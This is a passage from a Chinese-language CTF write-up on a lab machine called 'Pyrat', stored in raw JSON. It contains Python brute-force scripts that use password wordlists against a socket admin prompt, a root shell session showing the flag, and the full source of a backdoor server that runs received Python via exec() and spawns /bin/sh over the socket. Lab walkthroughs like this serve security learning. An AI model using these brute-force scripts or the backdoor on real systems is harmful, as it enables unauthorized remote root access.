client<\/code><\/pre>\n\u6240\u4ee5\u6211\u4eec\u60f3\u8981\u6267\u884c\u7684\u5c31\u662f\u8fd9\u4e2ashell\u3002\u3002\u8ba9root\u7684pyrat\u8fd0\u884c\u5f39\u51fashell\u7ed9\u6211\u4eec\uff1a<\/p>\n
<\/div><\/p>\n\u4e0b\u9762\u60f3\u529e\u6cd5\u641e\u4e00\u4e0b\uff1a<\/p>\n
\u4e0a\u7f51\u641c\u4e00\u4e0b\u8fd9\u4e2aPyrat\u662f\u4e2a\u5565\uff1a<\/p>\n
\nPyRat \u662f\u4e00\u4e2a\u7528\u6237\u53cb\u597d\u7684 Python \u5e93\uff0c\u7528\u4e8e\u5206\u6790\u6765\u81ea DeepLabCut \u7684\u6570\u636e\u3002\u65e8\u5728\u5e2e\u52a9\u4e0d\u719f\u6089\u7f16\u7a0b\u7684\u7814\u7a76\u4eba\u5458\u66f4\u7b80\u5355\u5730\u8fdb\u884c\u52a8\u7269\u884c\u4e3a\u5206\u6790\u3002<\/p>\n
PyRat \u662f\u4e00\u4e2a\u7528\u4e8e\u540e\u5904\u7406\u5408\u6210\u5b54\u5f84\u96f7\u8fbe (SAR) \u6570\u636e\u7684\u7075\u6d3b\u6846\u67b6\u3002\u5b83\u662f\u4e3a\u673a\u8f7d\u548c\u661f\u8f7d\u6570\u636e\u800c\u8bbe\u8ba1\u7684\uff0c\u7279\u522b\u4e13\u6ce8\u4e8e\u63d0\u4f9b\u4e00\u4e2a\u7b80\u5355\u7684\u57fa\u4e8e\u63d2\u4ef6\u7684\u7f16\u7a0b\u63a5\u53e3\u3002<\/p>\n
Python Remote Administrations Tools<\/p>\n<\/blockquote>\n
\u5f88\u660e\u663e\u662f\u7b2c\u4e09\u4e2a\uff0c\u8fd9\u91cc\u7684\u601d\u8def\u662f\u7206\u7834\u3002\u3002\u3002\u3002\uff08\u5077\u770bwp\uff09<\/p>\n
\u67e5\u770b\/var\/mail<\/code>\uff0c\u5b58\u5728\u90ae\u4ef6<\/p>\nFrom root@pyrat Thu Jun 15 09:08:55 2023\nReturn-Path: <root@pyrat>\nX-Original-To: think@pyrat\nDelivered-To: think@pyrat\nReceived: by pyrat.localdomain (Postfix, from userid 0)\n id 2E4312141; Thu, 15 Jun 2023 09:08:55 +0000 (UTC)\nSubject: Hello\nTo: <think@pyrat>\nX-Mailer: mail (GNU Mailutils 3.7)\nMessage-Id: <20230615090855.2E4312141@pyrat.localdomain>\nDate: Thu, 15 Jun 2023 09:08:55 +0000 (UTC)\nFrom: Dbile Admen <root@pyrat>\n\nHello jose, I wanted to tell you that i have installed the RAT you posted on your GitHub page, i'll test it tonight so don't be scared if you see it running. Regards, Dbile Admen<\/code><\/pre>\n\u7136\u540e\u76f4\u63a5\u5728\u4f5c\u8005\u7684github\u627e\u5230\u4e86https:\/\/github.com\/josemlwdf\/PyRAT<\/p>\n
\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u7528\u6237\u540d\u4e3aadmin<\/code>\uff0c\u8fd8\u627e\u5230\u4e00\u4e2a\u5bc6\u7801\uff1a<\/p>\n<\/div><\/p>\n\u4e3atestpass<\/code>\uff0c\u4f46\u662f\u6d4b\u8bd5\u8fc7\u53d1\u73b0\u4e0d\u662f\u8fd9\u4e2a\uff0c\u4f46\u662f\u7528\u6237\u4f3c\u4e4e\u662f\u8fd9\u4e2a\u3002<\/p>\n\u5728\u4ed6\u7684README.txt<\/code>\u4e2d\u6709\u8fd9\u51e0\u53e5\u8bdd\uff1a<\/p>\nAfter connecting, you can interact with the script using the following commands:<\/p>\n
\n- Admin<\/strong>: To access the admin functionality, type
admin<\/code> and press Enter. You will be prompted to enter a password. Enter the password and press Enter. If the password is correct, you will see the message "Welcome Admin!!! Type 'shell' to begin". You can then proceed to use the shell functionality.<\/li>\n- Shell<\/strong>: To access the shell functionality, type
shell<\/code> and press Enter. This will spawn a shell on the server, allowing you to execute commands. You can enter any valid shell command, and the output will be displayed on your nc<\/code> session.<\/li>\n- Python Interactive<\/strong>: To execute python commands on the server just send your python commands and it will be passed to the
exec<\/code> function.<\/li>\n<\/ul>\n\u4e00\u76f4\u6401\u7f6e\u6ca1\u6709\u505a\uff0c\u540e\u6765\u641e\u4e86\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/pyrat]\n\u2514\u2500$ sudo arp-scan -l -I eth1 \n[sudo] password for kali: \nInterface: eth1, type: EN10MB, MAC: 08:00:27:fb:51:ff, IPv4: 192.168.0.143\nStarting arp-scan 1.10.0 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n192.168.0.1 b0:0a:d5:b9:c2:92 zte corporation\n192.168.0.152 34:2e:b7:08:3d:a1 Intel Corporate\n192.168.0.179 08:00:27:99:ba:43 PCS Systemtechnik GmbH\n\n3 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.10.0: 256 hosts scanned in 2.014 seconds (127.11 hosts\/sec). 3 responded\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/pyrat]\n\u2514\u2500$ ssh think@192.168.0.179 \nThe authenticity of host '192.168.0.179 (192.168.0.179)' can't be established.\nED25519 key fingerprint is SHA256:Ndgax\/DOZA6JS00F3afY6VbwjVhV2fg5OAMP9TqPAOs.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.0.179' (ED25519) to the list of known hosts.\nthink@192.168.0.179's password: \nWelcome to Ubuntu 20.04.6 LTS (GNU\/Linux 5.4.0-150-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\n * Management: https:\/\/landscape.canonical.com\n * Support: https:\/\/ubuntu.com\/advantage\n\n System information as of Tue 16 Apr 2024 07:32:00 AM UTC\n\n System load: 0.09 Processes: 123\n Usage of \/: 45.7% of 9.75GB Users logged in: 0\n Memory usage: 10% IPv4 address for enp0s3: 192.168.0.179\n Swap usage: 0%\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\nExpanded Security Maintenance for Applications is not enabled.\n0 updates can be applied immediately.\nEnable ESM Apps to receive additional future security updates.\nSee https:\/\/ubuntu.com\/esm or run: sudo pro status\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nYou have mail.\nLast login: Mon Apr 1 10:13:01 2024 from 172.20.10.8\nthink@Pyrat:~$ <\/code><\/pre>\n\u4f5c\u8005\u89e3\u6cd5<\/h3>\nimport socket\n# Define the server's address and port\nserver_address = ('192.168.80.128', 8000) # Replace with your server's address and port\n\ndef send_word(word):\n # Create a socket object\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n # Connect to the server\n client_socket.connect(server_address)\n\n # Send the word to the server\n client_socket.sendall(word.encode())\n\n # Receive data from the server (if applicable)\n response = client_socket.recv(1024)\n response = response.decode()\n if not word in response:\n print(f"Sent: {word} | Received: {response}")\n\n except ConnectionRefusedError:\n print("Connection was refused. Is the server running?")\n finally:\n # Close the socket connection\n client_socket.close()\n\ndef read_wordlist_from_file(filename):\n with open(filename, 'r') as file:\n wordlist = file.readlines()\n return [word.strip() for word in wordlist]\n\n# Path to the wordlist file\nwordlist_filename = 'wordlist.txt'\n\n# Read words from the file\nwords = read_wordlist_from_file(wordlist_filename)\n\n# Iterate through the words and send each one to the server\nfor word in words:\n send_word(word)<\/code><\/pre>\n\u8fd9\u4e2a\u662f\u7528\u6765\u641e\u8d26\u53f7\u7684\uff0c\u4e0b\u9762\u662f\u7206\u7834\u5bc6\u7801\u7684\uff1a<\/p>\n
def test_this(password):\n # Create a socket object\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n # Connect to the server\n client_socket.connect(server_address)\n # Send the word to the server\n client_socket.sendall('admin'.encode())\n # Receive data from the server (if applicable)\n response = client_socket.recv(1024)\n response = response.decode()\n if 'Password' in response:\n client_socket.sendall(password)\n\n response = client_socket.recv(1024)\n response = response.decode()\n\n if not 'Password' in response:\n print('Password:', password)\n\n except ConnectionRefusedError:\n print("Connection was refused. Is the server running?")\n finally:\n # Close the socket connection\n client_socket.close()\n\ndef test_creds():\n from threading import Thread\n wordlist = '\/usr\/share\/seclists\/Passwords\/Leaked-Databases\/rockyou.txt'\n passwords = read_wordlist_from_file(wordlist)\n threads = []\n for password in passwords:\n thread = Thread(target=test_this, args=(password,))\n thread.start()\n threads.append(thread)\n if len(threads) >= 30:\n for thread in threads:\n thread.join()\n threads = []<\/code><\/pre>\n\u6309\u7167\u4f5c\u8005\u7684\u610f\u601d\uff0c\u4fee\u6539\u4e00\u4e0b\u5c31\u53ef\u4ee5\u7206\u7834\u51fa\u6765\u7684\uff0c\u4f46\u662f\u6211\u6ca1\u641e\u51fa\u6765\uff0c\u7206\u7834\u51fa\u6765\u662f\uff1a<\/p>\n
admin\nseptember<\/code><\/pre>\n\u7206\u7834\u51fa\u6765\u4ee5\u540e\u5c1d\u8bd5\u8fde\u63a5\u83b7\u53d6rootshell:<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/pyrat]\n\u2514\u2500# nc 192.168.0.179 8000\nadmin\nPassword:\nseptember\nWelcome Admin!!! Type "shell" to begin\nshell\n# whoami;id\nwhoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\n# ls -la\nls -la\ntotal 68\ndrwxrwx--- 7 root root 4096 Jan 4 08:32 .\ndrwxr-xr-x 18 root root 4096 Dec 22 13:22 ..\nlrwxrwxrwx 1 root root 9 Jun 2 2023 .bash_history -> \/dev\/null\n-rwxrwx--- 1 root root 3230 Jun 21 2023 .bashrc\ndrwx------ 2 root root 4096 Jun 21 2023 .cache\ndrwx------ 3 root root 4096 Dec 22 14:21 .config\n-rw-r--r-- 1 root root 29 Jun 21 2023 .gitconfig\ndrwxr-xr-x 3 root root 4096 Jan 4 08:32 .local\n-rwxrwx--- 1 root root 161 Dec 5 2019 .profile\n-rwxrwx--- 1 root root 5340 Dec 22 14:49 pyrat.py\n-rw-r----- 1 root root 33 Jun 15 2023 root.txt\n-rw-r--r-- 1 root root 75 Jun 15 2023 .selected_editor\ndrwxrwx--- 3 root root 4096 Jun 2 2023 snap\ndrwxrwx--- 2 root root 4096 Jun 2 2023 .ssh\n-rw-rw-rw- 1 root root 9204 Dec 22 14:49 .viminfo\n# cat root.txt\ncat root.txt\nba5ed03e9e74bb98054438480165e221\n# cat pyrat.py\ncat pyrat.py\nimport socket\nimport threading\nimport sys\nfrom io import StringIO\nimport datetime\nimport os\nimport getpass\nimport multiprocessing\n\nmanager = multiprocessing.Manager()\nadmins = manager.list()\n\ndef handle_client(client_socket, client_address):\n uid = os.getuid()\n uid_changed = False\n\n while True:\n # Receive data from the client\n try:\n data = client_socket.recv(1024).decode("utf-8")\n except Exception as e:\n # Send the exception message back to the client\n send_data(client_socket, e)\n continue\n\n if not data:\n continue\n\n if is_http(data):\n send_data(client_socket, fake_http())\n continue\n\n switch_case(client_socket, str(data).strip())\n\n # Close the connection with the client\n remove_socket(client_socket)\n\ndef switch_case(client_socket, data):\n if data == 'admin':\n get_admin(client_socket)\n else:\n # Check socket is admin and downgrade if is not aprooved\n uid = os.getuid()\n if (uid == 0) and (str(client_socket) not in admins):\n change_uid()\n\n if data == 'shell':\n shell(client_socket)\n else:\n exec_python(client_socket, data)\n\n# Tries to execute the random data with Python\ndef exec_python(client_socket, data):\n try:\n # Redirect stdout to capture the printed output\n captured_output = StringIO()\n sys.stdout = captured_output\n\n # Execute the received data as code\n exec(data)\n\n # Get the captured output\n exec_output = captured_output.getvalue()\n\n # Send the result back to the client\n send_data(client_socket, exec_output)\n except Exception as e:\n # Send the exception message back to the client\n send_data(client_socket, e)\n finally:\n # Reset stdout to the default\n sys.stdout = sys.__stdout__\n\n# Handles the Admin endpoint\ndef get_admin(client_socket):\n global admins\n\n uid = os.getuid()\n if (uid != 0):\n send_data(client_socket, "Start a fresh client to begin.")\n return\n\n password = 'september'\n\n for i in range(0, 3):\n # Ask for Password\n send_data(client_socket, "Password:")\n\n # Receive data from the client\n try:\n data = client_socket.recv(1024).decode("utf-8")\n except Exception as e:\n # Send the exception message back to the client\n send_data(client_socket, e)\n pass\n finally:\n # Reset stdout to the default\n sys.stdout = sys.__stdout__\n\n if data.strip() == password:\n admins.append(str(client_socket))\n send_data(client_socket, 'Welcome Admin!!! Type "shell" to begin')\n break\n\ndef shell(client_socket):\n try:\n import pty\n os.dup2(client_socket.fileno(), 0)\n os.dup2(client_socket.fileno(), 1)\n os.dup2(client_socket.fileno(), 2)\n pty.spawn("\/bin\/sh")\n except Exception as e:\n send_data(client_socket, e)\n\n# Sends data to the clients\ndef send_data(client_socket, data):\n try:\n client_socket.sendall((str(data) + '\\n').encode("utf-8"))\n except:\n remove_socket(client_socket)\n\ndef start_server(host, port):\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.bind((host, port))\n server_socket.listen(5)\n print(f"Server listening on {host}:{port}...")\n\n while True:\n client_socket, client_address = server_socket.accept()\n # Start a new process to handle the client\n p = multiprocessing.Process(target=handle_client, args=(client_socket, client_address))\n p.start()\n\ndef remove_socket(client_socket):\n client_socket.close()\n global admins\n\n # Replace the original and admins lists\n admins = admins._getvalue()\n\n try:\n if str(client_socket) in admins:\n admins.remove(str(client_socket))\n except:\n pass\n\n# Check if the received data is an HTTP request\ndef is_http(data):\n if ('HTTP' in data) and ('Host:' in data):\n return True\n return False\n\n# Sends a fake Python HTTP Server Banner\ndef fake_http():\n try:\n # Get the current date and time\n current_datetime = datetime.datetime.now()\n\n # Format the date and time according to the desired format\n formatted_datetime = current_datetime.strftime("%a %b %d %H:%M:%S %Z %Y")\n banner = """\nHTTP\/1.0 200 OK\nServer: SimpleHTTP\/0.6 Python\/3.11.2\nDate: {date}""".format(date=formatted_datetime) + """\nContent-type: text\/html; charset=utf-8\nContent-Length: 27\n\nTry a more basic connection!\n"""\n return banner[1:]\n except:\n return 'HTTP\/1.0 200 OK'\n\ndef change_uid():\n uid = os.getuid()\n\n if uid == 0:\n # Make python code execution run as user 33 (www-data)\n euid = 33\n groups = os.getgroups()\n if 0 in groups:\n groups.remove(0)\n os.setgroups(groups)\n os.setgid(euid)\n os.setuid(euid)\n\n# MAIN\nif __name__ == "__main__":\n host = "0.0.0.0" # Replace with your desired IP address\n port = 8000 # Replace with your desired port number\n\n try:\n start_server(host, port)\n except KeyboardInterrupt:\n print('Shutting Down...')\n sys.exit(1)<\/code><\/pre>\n\u7f16\u5199\u811a\u672c<\/h2>\n
\u6211\u54a8\u8be2\u4e86\u4e00\u4e0brpj7<\/code>\u5e08\u5085\uff1a<\/p>\nimport socket\n\nHOST = "10.0.0.108" # Server ip address\nPORT = 8000 # The port used by the server\n\ndef connectdostuff(fndata):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.sendall(b"admin\\n")\n data = s.recv(1024)\n s.sendall(bytes(fndata+"\\n",encoding="ascii"))\n data = s.recv(1024)\n s.close()\n print(f" {data!r}")\n\nfile1 = open('\/usr\/share\/wordlists\/metasploit\/unix_passwords.txt', 'r')\nLines = file1.readlines()\ncount=0\nfor line in Lines:\n count += 1\n print("Line{}: {}".format(count, line.strip()))\n connectdostuff(line)<\/code><\/pre>\n\u6b63\u5e38\u7684\u7a0b\u5e8f\u5e94\u7b54\u5e94\u8be5\u662f\u8fd9\u6837\u7684\uff1a<\/p>\n
<\/div><\/p>\n\u6211\u5c1d\u8bd5\u4f7f\u7528python\u7684pwntools\u5e93\u8fdb\u884c\u8fde\u63a5\u7206\u7834\u4f46\u662f\u5931\u8d25\u4e86\u3002\u3002\u3002\u3002rpj7<\/code>\u5e08\u5085\u7684\u811a\u672c\u5012\u662f\u8f7b\u800c\u6613\u4e3e\u5c31\u8fd0\u884c\u6210\u529f\u4e86\u3002<\/p>\n<\/div><\/p>\n","protected":false},"excerpt":{"rendered":"Pyrat \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nmap -sCV -p 1-65535 172.20.10.13 PORT […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-580","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=580"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/580\/revisions"}],"predecessor-version":[{"id":581,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/580\/revisions\/581"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=580"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240401145457040\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171918314.png\")
<\/div><\/p>\n![\"image-20240401151210576\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171918827.png\")
<\/div><\/p>\n![\"image-20240401154016589\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171917221.png\")
<\/div><\/p>\n![\"image-20240401184802967\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171917024.png\")
<\/div><\/p>\n![\"image-20240401185530905\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171917745.png\")
<\/div><\/p>\n![\"image-20240417190516847\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171917240.png\")
<\/div><\/p>\n![\"image-20240417191500925\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171917727.png\")
<\/div><\/p>\n","protected":false},"excerpt":{"rendered":"